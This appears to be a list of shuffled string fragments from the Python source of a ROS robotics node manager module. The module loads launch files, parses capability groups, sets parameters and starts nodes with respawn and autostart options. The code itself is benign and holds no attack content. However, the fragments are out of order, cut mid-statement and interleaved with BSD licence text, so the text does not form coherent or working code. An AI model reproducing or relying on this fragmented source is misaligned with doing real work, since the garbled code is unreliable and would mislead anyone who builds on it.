"# set the respawn environment variables respawn_params = self._get_respawn_params(rospy.names.ns_join(n.namespace, n.name)) if respawn_params['max'] >",
"description), ...])}''' self.robot_descr = ('', '', '') '''@ivar: robot description as tupel of",
"expected: ['name', 'type', 'images', 'description'] -> ignore\", param) else: for entry in p.value:",
"nodes with namespace self.sensors = {} # sensor descriptions launch_path = self.getPath(self.launch_file, self.package)",
"def _get_node(self, pkg, filename): cmd = None try: cmd = roslib.packages.find_node(pkg, filename) except",
"rosgraph.names.is_global(topic): topic = rospy.names.ns_join(rosgraph.names.namespace(node), topic) except: pass return topic def _get_respawn_params(self, node): result",
"must reproduce the above # copyright notice, this list of conditions and the",
"found, assign node to the group if not cap_ns: cap_ns = roslib.names.SEP #",
"n.name), autostart) if len(cmd) > 1: raise StartException('Multiple executables are found! The first",
"self.timed_service_creation, True) # if self.nodes: # self.runService = rospy.Service('~run', Task, self.rosservice_start_node) # self.listServic",
"following # disclaimer in the documentation and/or other materials provided # with the",
"self.package = rospy.get_param('~package', '') rospy.loginfo(\"package: %s\" % self.package) self.do_autostart = rospy.get_param('~autostart', False) rospy.loginfo(\"do_autostart:",
"is None: raise StartException(\"Node '%s' not found!\" % node) if autostart and self._get_start_exclude(rospy.names.ns_join(n.namespace,",
"# get the capability nodes for item in self.roscfg.nodes: node_fullname = roslib.names.ns_join(item.namespace, item.name)",
"AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL",
"'capability_group') if cap_ns == node_fullname: cap_ns = item.namespace.rstrip(roslib.names.SEP) # if the parameter group",
"specified parameter namespaces # #2468 unify clear params to prevent error for p",
"# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED",
"its # contributors may be used to endorse or promote products derived #",
"result['delay'] = int(self.roscfg.params[respawn_delay].value) except: pass return result def get_ros_home(self): ''' Returns the ROS",
"OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON",
"else: self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) # get the robot description self.description_response = dr = ListDescriptionResponse()",
"self.package) self.do_autostart = rospy.get_param('~autostart', False) rospy.loginfo(\"do_autostart: %s\" % self.do_autostart) self.load_params_at_start = rospy.get_param('~load_params_at_start', True)",
"self._pending_starts = set() self._pending_starts_last_printed = set() def _filter_args(self, argv): afilter = ['__ns:=', '__name:=',",
"as e: rospy.logwarn(\"Error while start %s: %s\", n, e) self.do_autostart = False def",
"@rtype: C{str} ''' try: import rospkg.distro distro = rospkg.distro.current_distro_codename() if distro in ['electric',",
"rospy.names.ns_join(node, 'default_cfg/autostart/delay') try: return float(self.roscfg.params[param_name].value) except: pass return 0. def _get_start_required(self, node): param_name",
"cap.name = group cap.type = descr_dict['type'] cap.images = list(descr_dict['images']) cap.description = descr_dict['description'] cap.nodes",
"in the given package if package: paths = roslib.packages.find_resource(package, launch_file) if len(paths) >",
"be used to endorse or promote products derived # from this software without",
"path: C{str} @param package: the package containing the launch file or an empty",
"# determine the current working path, Default: the package of the node cwd",
"import ROSLaunchConfig, XmlLoader import os import rosgraph.masterapi import rosgraph.names import roslib.names import roslib.network",
"launch file. ''' pass class StartException(Exception): ''' The exception throwing while run a",
"_get_start_required(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/required/publisher') topic = '' try: topic = self.roscfg.params[param_name].value",
"names of its # contributors may be used to endorse or promote products",
"start a node. ''' self.runNode(req.node) return [] def rosservice_reload(self, req): self.load(2.) return []",
"['electric', 'diamondback', 'cturtle']: return roslib.rosenv.get_master_uri() else: return rosgraph.rosenv.get_master_uri() except: return roslib.rosenv.get_master_uri() def _timed_service_creation(self):",
"n.machine_name == 'localhost': # machine = self.roscfg.machines[n.machine_name] # TODO: env-loader support? # if",
"code != 1: # raise StartException(\"Failed to clear parameter: %s\"%(msg)) # multi-call objects",
"with self.__lock: self._pending_starts.clear() # shutdown the services to inform the caller about a",
"params to prevent error for p in clear_params: param_server_multi.deleteParam(rospy.get_name(), p) r = param_server_multi()",
"= v # the ROS_NAMESPACE environment is used in cpp plugins in rqt",
"prefix, cmd[0]] cmd_args = [ScreenHandler.getSceenCmd(node)] cmd_args[len(cmd_args):] = node_cmd cmd_args.append(n.args) cmd_args[len(cmd_args):] = args #",
"HACK to let the node_manager to update the view if delay_service_creation > 0.:",
"if ns not in result[machine_name]: result[machine_name][ns] = dict() if p.value not in result[machine_name][ns]:",
"n.remap_args: args.append('%s:=%s' % (remap[0], remap[1])) # masteruri = self.masteruri # if n.machine_name and",
"False) # initialize the ROS services # rospy.Service('~load', LoadLaunch, self.rosservice_load_launch) self._reload_service = rospy.Service('~reload',",
"autostart and start_required: start_now = False # get published topics from ROS master",
"not (n.cwd is None): args.append('__cwd:=%s' % n.cwd) # add remaps for remap in",
"current pending autostarts if self._pending_starts_last_printed != self._pending_starts: self._pending_starts_last_printed.clear() self._pending_starts_last_printed.update(self._pending_starts) rospy.loginfo(\"Pending autostarts %d: %s\",",
"''' Parses the launch file for C{capabilities} and C{capability_group} parameter and creates dictionary",
"''' pass class DefaultCfg(object): def __init__(self): self.nodes = [] '''@ivar: the list with",
"distribution API. @return: ROS HOME path @rtype: C{str} ''' try: import rospkg.distro distro",
"are met: # # * Redistributions of source code must retain the above",
"return result def load(self, delay_service_creation=0.): ''' Load the launch file configuration ''' with",
"respawn_params['delay'])) node_cmd = [respawn[0], prefix, cmd[0]] cmd_args = [ScreenHandler.getSceenCmd(node)] cmd_args[len(cmd_args):] = node_cmd cmd_args.append(n.args)",
"new_env[k] except: pass # add node environment parameter for k, v in n.env_args:",
"nodes. ''' return ListNodesResponse(self.nodes) def rosservice_start_node(self, req): ''' Callback for the ROS service",
"C{unicode} or original on error ''' result = val.replace(\"\\\\n \", \"\\n\") try: result",
"from roslaunch import ROSLaunchConfig, XmlLoader import os import rosgraph.masterapi import rosgraph.names import roslib.names",
"WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND",
"CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR",
"True break if ':=' not in a or in_filter: continue result.append(a) return result",
"!= 5: print(\"WRONG format, expected: ['host(ROS master Name)', 'type', 'name', 'images', 'description'] ->",
"while start. ''' if not self.parameter_loaded: self.loadParams() n = None for item in",
"= set() def _filter_args(self, argv): afilter = ['__ns:=', '__name:=', '_package:=', '_launch_file:='] result =",
"# ''' # try: # self.__lock.acquire() # self.load(req.package, req.file, req.argv) # finally: #",
"= args # print 'runNode: ', cmd_args popen_cmd = shlex.split(str(' '.join(cmd_args))) rospy.loginfo(\"run node",
"nodes. @return: the capabilities description stored in this configuration @rtype: C{dict(machine : dict(namespace:",
"first one will be tacked. @param path: the file name of the launch",
"about a new configuration. ''' self.description_response = ListDescriptionResponse() # variables to print the",
"launch file for C{capabilities} and C{capability_group} parameter and creates dictionary for grouping the",
"autostart and start_delay > 0: start_now = False # start timer for delayed",
"launch file in the given package if package: paths = roslib.packages.find_resource(package, launch_file) if",
"node: C{str} @raise StartException: if an error occurred while start. ''' if not",
"not in self.roscfg.params and cap_param.count(roslib.names.SEP) > 1: cap_ns = roslib.names.namespace(cap_ns).rstrip(roslib.names.SEP) if not cap_ns:",
"service will be created on each load of a launch file to inform",
"system default @type val: str @return: the decoded string @rtype: C{unicode} or original",
"absolute path @type package: C{str} @return: the absolute path of the launch file",
"(filename, pkg)) return cmd def _get_start_exclude(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/exclude') try: return",
"item.name)) # get the robot description self.description_response = dr = ListDescriptionResponse() dr.robot_name =",
"package=''): ''' Searches for a launch file. If package is given, try first",
"= [] '''@ivar: the list with names of nodes with name spaces.''' self.sensors",
"%s\", n, e) self.do_autostart = False def _decode(self, val): ''' Replaces the '\\\\n'",
"services # HACK to let the node_manager to update the view if delay_service_creation",
"is not None: # get the capabilities description # use two separate loops,",
"machine_name not in result: result[machine_name] = dict() for (ns, groups) in result[machine_name].items(): if",
"respawn_params = self._get_respawn_params(rospy.names.ns_join(n.namespace, n.name)) if respawn_params['max'] > 0: n.env_args.append(('RESPAWN_MAX', '%d' % respawn_params['max'])) if",
"None or len(cmd) == 0: raise StartException('%s in package [%s] not found!' %",
"prevent error for p in clear_params: param_server_multi.deleteParam(rospy.get_name(), p) r = param_server_multi() # for",
"self._get_node('node_manager_fkie', 'respawn') # set the respawn environment variables respawn_params = self._get_respawn_params(rospy.names.ns_join(n.namespace, n.name)) if",
"roslib.rosenv.get_ros_home() @classmethod def _load_parameters(cls, masteruri, params, clear_params): \"\"\" Load parameters onto the parameter",
"materials provided # with the distribution. # * Neither the name of Fraunhofer",
"description as tupel of (type, name, text) ''' self.package = '' self.file =",
"= None '''@ivar: The service will be created on each load of a",
"or roslib.network.is_local_address(machine): for ns, group_dict in ns_dict.items(): for group, descr_dict in group_dict.items(): if",
"result[machine_name][ns][p.value] = {'type': '', 'images': [], 'description': '', 'nodes': []} result[machine_name][ns][p.value]['nodes'].append(node_fullname) return result",
"launch file or an empty string, if the C{file} is an absolute path",
"rospy.get_param('~argv', []) rospy.loginfo(\"argv: %s\" % self.argv) if not isinstance(self.argv, list): self.argv = [\"%s\"",
"file: %s\", launch_path) self.masteruri = self._masteruri_from_ros() self.roscfg = ROSLaunchConfig() loader = XmlLoader() argv",
"else: for entry in p.value: capabilies_descr[entry[0]] = {'type': ''.join([entry[1]]), 'images': entry[2].split(','), 'description': self._decode(entry[3])}",
"machine = self.roscfg.machines[n.machine_name] # TODO: env-loader support? # if machine.env_args: # env[len(env):] =",
"description stored in this configuration @rtype: C{dict(machine : dict(namespace: dict(group:dict('type' : str, 'description'",
"namespace while cap_param not in self.roscfg.params and cap_param.count(roslib.names.SEP) > 1: cap_ns = roslib.names.namespace(cap_ns).rstrip(roslib.names.SEP)",
"nodes, invalid package raise StartException(str(e)) except Exception as e: raise StartException(str(e)) # handle",
"the name of the node @type node: C{str} @raise StartException: if an error",
"# Start the timer for waiting for the topic start_timer = threading.Timer(3., self._run_node,",
"is None: self.runService = rospy.Service('~run', Task, self.rosservice_start_node) if self.listService is None: self.listService =",
"self.__lock.release() # return [] def rosservice_description(self, req): ''' Returns the current description. '''",
"= '' dr.robot_type = '' dr.robot_descr = '' for param, p in self.roscfg.params.items():",
"respawn_params['min_runtime'])) if respawn_params['delay'] > 0: n.env_args.append(('RESPAWN_DELAY', '%d' % respawn_params['delay'])) node_cmd = [respawn[0], prefix,",
"__future__ import print_function from multimaster_msgs_fkie.msg import Capability from multimaster_msgs_fkie.srv import ListDescription, ListNodes, Task,",
"= '' elif not rosgraph.names.is_global(topic): topic = rospy.names.ns_join(rosgraph.names.namespace(node), topic) except: pass return topic",
"= rospy.names.ns_join(node, 'respawn/max') respawn_min_runtime = rospy.names.ns_join(node, 'respawn/min_runtime') respawn_delay = rospy.names.ns_join(node, 'respawn/delay') try: result['max']",
"FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, #",
"The first one was started! Exceutables:\\n%s' % str(cmd)) def _run_node(self, cmd, cwd, env,",
"variables respawn_params = self._get_respawn_params(rospy.names.ns_join(n.namespace, n.name)) if respawn_params['max'] > 0: n.env_args.append(('RESPAWN_MAX', '%d' % respawn_params['max']))",
"{'type': capabilies_descr[p.value]['type'], 'images': capabilies_descr[p.value]['images'], 'description': capabilies_descr[p.value]['description'], 'nodes': []} except: result[machine_name][ns][p.value] = {'type': '',",
"list(argv) # set the global environment to empty namespace os.environ[ROS_NAMESPACE] = rospy.names.SEP rospy.set_param('~argv_used',",
"shutdown the services to inform the caller about a new configuration. if self.runService",
"rospy.Timer(rospy.Duration(2), self.timed_service_creation, True) # if self.nodes: # self.runService = rospy.Service('~run', Task, self.rosservice_start_node) #",
"API. @return: ROS HOME path @rtype: C{str} ''' try: import rospkg.distro distro =",
"args.append('__cwd:=%s' % n.cwd) # add remaps for remap in n.remap_args: args.append('%s:=%s' % (remap[0],",
"req.argv) # finally: # self.__lock.release() # return [] def rosservice_description(self, req): ''' Returns",
"the names of its # contributors may be used to endorse or promote",
"topic) except: pass return topic def _get_respawn_params(self, node): result = {'max': 0, 'min_runtime':",
"is not None else '' args = ['__ns:=%s' % n.namespace, '__name:=%s' % n.name]",
"n.launch_prefix if n.launch_prefix is not None else '' args = ['__ns:=%s' % n.namespace,",
"@type path: C{str} @param package: the package containing the launch file or an",
"this list of conditions and the following # disclaimer in the documentation and/or",
"the capability group parameter in namespace while cap_param not in self.roscfg.params and cap_param.count(roslib.names.SEP)",
"rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) # except: # import traceback # print traceback.format_exc() if self.do_autostart:",
"as e: # multiple nodes, invalid package raise StartException(str(e)) except Exception as e:",
"assign node to the group if not cap_ns: cap_ns = roslib.names.SEP # if",
"rosservice_reload(self, req): self.load(2.) return [] # def rosservice_load_launch(self, req): # ''' # Load",
"# Redistribution and use in source and binary forms, with or without #",
"= node_cmd cmd_args.append(n.args) cmd_args[len(cmd_args):] = args # print 'runNode: ', cmd_args popen_cmd =",
"# Load the launch file # ''' # try: # self.__lock.acquire() # self.load(req.package,",
"nor the names of its # contributors may be used to endorse or",
"given package. If more then one launch file with the same name found",
"dict() for param, value in self.roscfg.params.items(): params[param] = value # rospy.loginfo(\"register PARAMS:\\n%s\", '\\n'.join(params))",
"float(self.roscfg.params[param_name].value) except: pass return 0. def _get_start_required(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/required/publisher') topic",
"Default: the package of the node cwd = self.get_ros_home() if not (n.cwd is",
"and autostart and start_delay > 0: start_now = False # start timer for",
"node, str(' '.join(popen_cmd))) # remove the 'BASH_ENV' and 'ENV' from environment new_env =",
"not in a or in_filter: continue result.append(a) return result def load(self, delay_service_creation=0.): '''",
"(ns, groups) in result[machine_name].items(): if ns == cap_ns and p.value in groups: groups[p.value]['nodes'].append(node_fullname)",
"self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) else: self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) # get the robot description self.description_response = dr",
"self.runNode(n, self.do_autostart) except Exception as e: rospy.logwarn(\"Error while start %s: %s\", n, e)",
"start %s: %s\", n, e) self.do_autostart = False def _decode(self, val): ''' Replaces",
"of source code must retain the above copyright # notice, this list of",
"= Capability() cap.namespace = ns cap.name = group cap.type = descr_dict['type'] cap.images =",
"node: n = item break if n is None: raise StartException(\"Node '%s' not",
"with node names for item in self.roscfg.nodes: if item.machine_name and not item.machine_name ==",
"a or in_filter: continue result.append(a) return result def load(self, delay_service_creation=0.): ''' Load the",
"names of nodes with name spaces.''' self.sensors = {} '''@ivar: Sensor description: C{dict(node",
"self.__lock: self._pending_starts.clear() # shutdown the services to inform the caller about a new",
"# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A",
"parameter and creates dictionary for grouping the nodes. @return: the capabilities description stored",
"# nm.screen().testScreen() cmd = self._get_node(n.package, n.type) # determine the current working path, Default:",
"self._masteruri_from_ros() self.roscfg = ROSLaunchConfig() loader = XmlLoader() argv = self._filter_args(sys.argv) # remove namespace",
"file to inform the caller about a new configuration. ''' self.listService = None",
"promote products derived # from this software without specific prior written permission. #",
"USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH",
"@type package: C{str} @return: the absolute path of the launch file @rtype: C{str}",
"descr_dict in group_dict.items(): if descr_dict['nodes']: cap = Capability() cap.namespace = ns cap.name =",
"''' Callback for the ROS service to start a node. ''' self.runNode(req.node) return",
"result.decode(sys.getfilesystemencoding()) except: pass return result def getCapabilitiesDesrc(self): ''' Parses the launch file for",
"xmlrpclib.MultiCall(param_server) # clear specified parameter namespaces # #2468 unify clear params to prevent",
"if isinstance(p.value, list): if len(p.value) > 0 and len(p.value[0]) != 4: print(\"WRONG format,",
"current working path, Default: the package of the node cwd = self.get_ros_home() if",
"to avoid 'defunct' processes thread = threading.Thread(target=ps.wait) thread.setDaemon(True) thread.start() # remove from pending",
"machine or roslib.network.is_local_address(machine): for ns, group_dict in ns_dict.items(): for group, descr_dict in group_dict.items():",
"roslib.network.is_local_address(machine): for ns, group_dict in ns_dict.items(): for group, descr_dict in group_dict.items(): if descr_dict['nodes']:",
"ns_dict.items(): for group, descr_dict in group_dict.items(): if descr_dict['nodes']: cap = Capability() cap.namespace =",
"'capability_group' parameter found, assign node to the group if cap_param in self.roscfg.params and",
"self.runService is not None: self.runService.shutdown('reload config') self.runService = None if self.listService is not",
"add new group in the namespace of the node if ns not in",
"ROS_NAMESPACE environment is used in cpp plugins in rqt if n.namespace: new_env['ROS_NAMESPACE'] =",
"# # * Redistributions of source code must retain the above copyright #",
"rospy.names.ns_join(rosgraph.names.namespace(node), topic) except: pass return topic def _get_respawn_params(self, node): result = {'max': 0,",
"['host(ROS master Name)', 'type', 'name', 'images', 'description'] -> ignore\", param) else: for entry",
"@rtype: C{dict(machine : dict(namespace: dict(group:dict('type' : str, 'description' : str, 'nodes' : [str]))))}",
"in afilter: if a.startswith(f): in_filter = True break if ':=' not in a",
"# add remaps for remap in n.remap_args: args.append('%s:=%s' % (remap[0], remap[1])) # masteruri",
"of the launch file @type path: C{str} @param package: the package containing the",
"not item.machine_name == 'localhost': machine = self.roscfg.machines[item.machine_name] if roslib.network.is_local_address(machine.address): self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) else: self.nodes.append(roslib.names.ns_join(item.namespace,",
"self._get_respawn_params(rospy.names.ns_join(n.namespace, n.name)) if respawn_params['max'] > 0: n.env_args.append(('RESPAWN_MAX', '%d' % respawn_params['max'])) if respawn_params['min_runtime'] >",
"autostart) if len(cmd) > 1: raise StartException('Multiple executables are found! The first one",
"machine, ns_dict in tmp_cap_dict.items(): if machine in self.roscfg.machines: machine = self.roscfg.machines[machine].address if not",
"= [respawn[0], prefix, cmd[0]] cmd_args = [ScreenHandler.getSceenCmd(node)] cmd_args[len(cmd_args):] = node_cmd cmd_args.append(n.args) cmd_args[len(cmd_args):] =",
"pass return 0. def _get_start_required(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/required/publisher') topic = ''",
"'.join(popen_cmd))) # remove the 'BASH_ENV' and 'ENV' from environment new_env = dict(os.environ) try:",
"'default_cfg/autostart/exclude') try: return bool(self.roscfg.params[param_name].value) except: pass return False def _get_start_delay(self, node): param_name =",
"if descr_dict['nodes']: cap = Capability() cap.namespace = ns cap.name = group cap.type =",
"# if n.machine_name and not n.machine_name == 'localhost': # machine = self.roscfg.machines[n.machine_name] #",
"copyright # notice, this list of conditions and the following disclaimer. # *",
"import traceback # print traceback.format_exc() if self.do_autostart: if not self.parameter_loaded: self.loadParams() for n",
"list first for param, p in self.roscfg.params.items(): if param.endswith('capabilities'): if isinstance(p.value, list): if",
"with given name from the currently loaded configuration. @param node: the name of",
"added = False cap_param = roslib.names.ns_join(node_fullname, 'capability_group') cap_ns = node_fullname # find the",
"'' dr.robot_type = '' dr.robot_descr = '' for param, p in self.roscfg.params.items(): if",
"in self.nodes: try: self.runNode(n, self.do_autostart) except Exception as e: rospy.logwarn(\"Error while start %s:",
"= rospy.names.ns_join(node, 'respawn/delay') try: result['max'] = int(self.roscfg.params[respawn_max].value) except: pass try: result['min_runtime'] = int(self.roscfg.params[respawn_min_runtime].value)",
"# for code, msg, _ in r: # if code != 1: #",
"= ['__ns:=%s' % n.namespace, '__name:=%s' % n.name] if not (n.cwd is None): args.append('__cwd:=%s'",
"start_now: # Start the timer for waiting for the topic start_timer = threading.Timer(3.,",
"''' params = dict() for param, value in self.roscfg.params.items(): params[param] = value #",
"remaps for remap in n.remap_args: args.append('%s:=%s' % (remap[0], remap[1])) # masteruri = self.masteruri",
"0: start_now = False # start timer for delayed start start_timer = threading.Timer(start_delay,",
"# printlog(\"setting parameter [%s]\"%p.key) param_server_multi.setParam(rospy.get_name(), p.key, p.value) r = param_server_multi() for code, msg,",
"containing in the loaded configuration. ''' pass class DefaultCfg(object): def __init__(self): self.nodes =",
"pkg, filename): cmd = None try: cmd = roslib.packages.find_node(pkg, filename) except roslib.packages.ROSPkgException as",
"a new configuration. ''' self.description_response = ListDescriptionResponse() # variables to print the pending",
"{'max': 0, 'min_runtime': 0, 'delay': 0} respawn_max = rospy.names.ns_join(node, 'respawn/max') respawn_min_runtime = rospy.names.ns_join(node,",
"launch file is found, take the first one launch_file = paths[0] if os.path.isfile(launch_file)",
"launch file. If package is given, try first to find the launch file",
"self.do_autostart: if not self.parameter_loaded: self.loadParams() for n in self.nodes: try: self.runNode(n, self.do_autostart) except",
"val: str @return: the decoded string @rtype: C{unicode} or original on error '''",
"about a new configuration. if self.runService is not None: self.runService.shutdown('reload config') self.runService =",
"take the first one launch_file = paths[0] if os.path.isfile(launch_file) and os.path.exists(launch_file): return launch_file",
"== node_fullname: cap_ns = item.namespace.rstrip(roslib.names.SEP) # if the parameter group parameter found, assign",
"capabilies_descr[p.value]['type'], 'images': capabilies_descr[p.value]['images'], 'description': capabilies_descr[p.value]['description'], 'nodes': []} except: result[machine_name][ns][p.value] = {'type': '', 'images':",
"p in self.roscfg.params.items(): if param.endswith('capabilities'): if isinstance(p.value, list): if len(p.value) > 0 and",
"License Agreement (BSD License) # # Copyright (c) 2012, Fraunhofer FKIE/US, <NAME> #",
"two separate loops, to create the description list first for param, p in",
"if n.cwd == 'ROS_HOME': cwd = self.get_ros_home() elif n.cwd == 'node': cwd =",
"# remove from pending autostarts try: self._pending_starts.remove(node) except: pass # print the current",
"return roslib.rosenv.get_ros_home() @classmethod def _load_parameters(cls, masteruri, params, clear_params): \"\"\" Load parameters onto the",
"afilter = ['__ns:=', '__name:=', '_package:=', '_launch_file:='] result = [] for a in argv:",
"update the view if delay_service_creation > 0.: t = threading.Timer(delay_service_creation, self._timed_service_creation) t.start() else:",
"'' added = False cap_param = roslib.names.ns_join(node_fullname, 'capability_group') cap_ns = node_fullname # find",
"not in result[machine_name][ns]: try: result[machine_name][ns][p.value] = {'type': capabilies_descr[p.value]['type'], 'images': capabilies_descr[p.value]['images'], 'description': capabilies_descr[p.value]['description'], 'nodes':",
"False def _decode(self, val): ''' Replaces the '\\\\n' by LF (Line Feed) and",
"StartException: if an error occurred while start. ''' if not self.parameter_loaded: self.loadParams() n",
"# load parameters into the ROS parameter server if self.load_params_at_start: self.loadParams() # initialize",
"file in the given package if package: paths = roslib.packages.find_resource(package, launch_file) if len(paths)",
"tacked. @param path: the file name of the launch file @type path: C{str}",
"def _filter_args(self, argv): afilter = ['__ns:=', '__name:=', '_package:=', '_launch_file:='] result = [] for",
"ignore\", param) else: for entry in p.value: try: print(entry[0], rospy.get_param('/mastername', '')) if not",
"try first to find the launch file in the given package. If more",
"= dict() if self.roscfg is not None: # get the capabilities description #",
"= None if self.listService is not None: self.listService.shutdown('reload config') self.listService = None self.nodes",
"if len(p.value) > 0 and len(p.value[0]) != 4: print(\"WRONG format, expected: ['name', 'type',",
"(str,) if isinstance(cmd, string_types): cmd = [cmd] if cmd is None or len(cmd)",
"'''@ivar: robot description as tupel of (type, name, text) ''' self.package = ''",
"capability nodes for item in self.roscfg.nodes: node_fullname = roslib.names.ns_join(item.namespace, item.name) machine_name = item.machine_name",
"args.append('%s:=%s' % (remap[0], remap[1])) # masteruri = self.masteruri # if n.machine_name and not",
"the node cwd = self.get_ros_home() if not (n.cwd is None): if n.cwd ==",
"in self.roscfg.params.items(): params[param] = value # rospy.loginfo(\"register PARAMS:\\n%s\", '\\n'.join(params)) self._load_parameters(self.masteruri, params, self.roscfg.clear_params) self.parameter_loaded",
"description self.description_response = dr = ListDescriptionResponse() dr.robot_name = '' dr.robot_type = '' dr.robot_descr",
"class LoadException(Exception): ''' The exception throwing while searching for the given launch file.",
"self._pending_starts) def _get_node(self, pkg, filename): cmd = None try: cmd = roslib.packages.find_node(pkg, filename)",
"service to get the list with available nodes. ''' return ListNodesResponse(self.nodes) def rosservice_start_node(self,",
"threading.Thread(target=ps.wait) thread.setDaemon(True) thread.start() # remove from pending autostarts try: self._pending_starts.remove(node) except: pass #",
"param_name = rospy.names.ns_join(node, 'default_cfg/autostart/exclude') try: return bool(self.roscfg.params[param_name].value) except: pass return False def _get_start_delay(self,",
"str, 'description' : str, 'nodes' : [str]))))} ''' result = dict() capabilies_descr =",
"cmd_args[len(cmd_args):] = node_cmd cmd_args.append(n.args) cmd_args[len(cmd_args):] = args # print 'runNode: ', cmd_args popen_cmd",
"if not (n.cwd is None): args.append('__cwd:=%s' % n.cwd) # add remaps for remap",
"elif n.cwd == 'node': cwd = os.path.dirname(cmd[0]) respawn = [''] if n.respawn: respawn",
"is None: self.listService = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) except: import traceback print(traceback.format_exc()) def getPath(self,",
"# rospy.Service('~load', LoadLaunch, self.rosservice_load_launch) self._reload_service = rospy.Service('~reload', std_srvs.srv.Empty, self.rosservice_reload) rospy.Service('~description', ListDescription, self.rosservice_description) self.runService",
"if distro in ['electric', 'diamondback', 'cturtle']: import roslib.rosenv return roslib.rosenv.get_ros_home() else: import rospkg",
"NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR",
"# print traceback.format_exc() if self.do_autostart: if not self.parameter_loaded: self.loadParams() for n in self.nodes:",
"given file is not found ''' launch_file = path # if package is",
"= dict() for (ns, groups) in result[machine_name].items(): if ns == cap_ns and p.value",
"Task, self.rosservice_start_node) if self.listService is None: self.listService = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) except: import",
"self.robot_descr = ('', '', '') '''@ivar: robot description as tupel of (type, name,",
"package, the first one will be tacked. @param path: the file name of",
"conditions and the following disclaimer. # * Redistributions in binary form must reproduce",
"are not reusable param_server_multi = xmlrpclib.MultiCall(param_server) for p in params.itervalues(): # suppressing this",
"topic: start_now = True break if not start_now: # Start the timer for",
"param_server_multi = xmlrpclib.MultiCall(param_server) # clear specified parameter namespaces # #2468 unify clear params",
"= [ScreenHandler.getSceenCmd(node)] cmd_args[len(cmd_args):] = node_cmd cmd_args.append(n.args) cmd_args[len(cmd_args):] = args # print 'runNode: ',",
"start_required: start_now = False # get published topics from ROS master master =",
"launch_file = paths[0] if os.path.isfile(launch_file) and os.path.exists(launch_file): return launch_file raise LoadException('File %s in",
"distro in ['electric', 'diamondback', 'cturtle']: return roslib.rosenv.get_master_uri() else: return rosgraph.rosenv.get_master_uri() except: return roslib.rosenv.get_master_uri()",
"get the robot description self.description_response = dr = ListDescriptionResponse() dr.robot_name = '' dr.robot_type",
"self._load_parameters(self.masteruri, params, self.roscfg.clear_params) self.parameter_loaded = True def runNode(self, node, autostart=False): ''' Start the",
"print(traceback.format_exc()) import roslib.rosenv return roslib.rosenv.get_ros_home() @classmethod def _load_parameters(cls, masteruri, params, clear_params): \"\"\" Load",
"# from this software without specific prior written permission. # # THIS SOFTWARE",
"'%d' % respawn_params['delay'])) node_cmd = [respawn[0], prefix, cmd[0]] cmd_args = [ScreenHandler.getSceenCmd(node)] cmd_args[len(cmd_args):] =",
"self.loadParams() n = None for item in self.roscfg.nodes: itemname = rospy.names.ns_join(item.namespace, item.name) if",
"item break if n is None: raise StartException(\"Node '%s' not found!\" % node)",
"= roslib.names.ns_join(item.namespace, item.name) machine_name = item.machine_name if item.machine_name is not None and not",
"# , LoadLaunch from rosgraph.rosenv import ROS_NAMESPACE from roslaunch import ROSLaunchConfig, XmlLoader import",
"this configuration @rtype: C{dict(machine : dict(namespace: dict(group:dict('type' : str, 'description' : str, 'nodes'",
"ROS master master = rosgraph.masterapi.Master(self.masteruri) for topic, datatype in master.getPublishedTopics(''): if start_required ==",
"in params.itervalues(): # suppressing this as it causes too much spam # printlog(\"setting",
"# suppressing this as it causes too much spam # printlog(\"setting parameter [%s]\"%p.key)",
"rospy.names.ns_join(item.namespace, item.name) if itemname == node: n = item break if n is",
"if code != 1: # raise StartException(\"Failed to clear parameter: %s\"%(msg)) # multi-call",
"# multi-call objects are not reusable param_server_multi = xmlrpclib.MultiCall(param_server) for p in params.itervalues():",
"= '' self.file = '' self.__lock = threading.RLock() # Load parameter self.launch_file =",
"if autostart and start_required: start_now = False # get published topics from ROS",
"respawn = self._get_node('node_manager_fkie', 'respawn') # set the respawn environment variables respawn_params = self._get_respawn_params(rospy.names.ns_join(n.namespace,",
"inform the caller about a new configuration. ''' self.listService = None '''@ivar: The",
"URI @rtype: C{str} ''' try: import rospkg.distro distro = rospkg.distro.current_distro_codename() if distro in",
"(n.cwd is None): args.append('__cwd:=%s' % n.cwd) # add remaps for remap in n.remap_args:",
"= True def runNode(self, node, autostart=False): ''' Start the node with given name",
"decode the string entry from system default coding to unicode. @param val: the",
"on each load of a launch file to inform the caller about a",
"in self.roscfg.params.items(): if param.endswith('capabilities'): if isinstance(p.value, list): if len(p.value) > 0 and len(p.value[0])",
"env, node, False)) start_timer.start() if start_now: ps = subprocess.Popen(cmd, cwd=cwd, env=env) # wait",
"exception throwing while run a node containing in the loaded configuration. ''' pass",
"remove namespace from sys.argv to avoid load the launchfile info local namespace sys.argv",
"with name spaces.''' self.sensors = {} '''@ivar: Sensor description: C{dict(node name : [(sensor",
"cwd = self.get_ros_home() if not (n.cwd is None): if n.cwd == 'ROS_HOME': cwd",
"rights reserved. # # Redistribution and use in source and binary forms, with",
"0: raise StartException('%s in package [%s] not found!' % (filename, pkg)) return cmd",
"if self.roscfg is not None: # get the capabilities description # use two",
"LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA,",
